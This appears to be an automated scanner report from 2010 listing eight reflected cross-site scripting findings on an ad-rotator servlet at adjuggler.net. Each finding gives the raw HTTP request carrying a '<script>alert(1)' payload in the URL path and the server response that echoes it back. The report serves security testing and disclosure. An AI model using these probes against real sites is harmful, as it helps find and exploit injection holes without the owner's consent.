1. Cross-site scripting (reflected)
1.1. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/cc [REST URL parameter 1]
1.2. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/cc [REST URL parameter 2]
1.3. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/cj [REST URL parameter 1]
1.4. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/cj [REST URL parameter 2]
1.5. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/vc [REST URL parameter 1]
1.6. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/vc [REST URL parameter 2]
1.7. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/vj [REST URL parameter 1]
1.8. http://fidelity.rotator.hadj7.adjuggler.net/servlet/ajrotator/50110/0/vj [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet7b0e3<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:29 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet7b0e3<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet/ajrotator759c8<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:38 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator759c8<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet246b0<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:34 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet246b0<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet/ajrotator402c3<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:45 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator402c3<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet52f95<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:36 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet52f95<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet/ajrotator61eda<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:45 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator61eda<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet89985<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:33 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet89985<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://fidelity.rotator |
Path: | /servlet/ajrotator/50110 |
GET /servlet/ajrotatore88ed<script>alert(1)< Host: fidelity.rotator.hadj7 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajess1_AE79DE126A28B |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 05 Nov 2010 04:50:42 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotatore88ed<script>alert(1)< <BR> |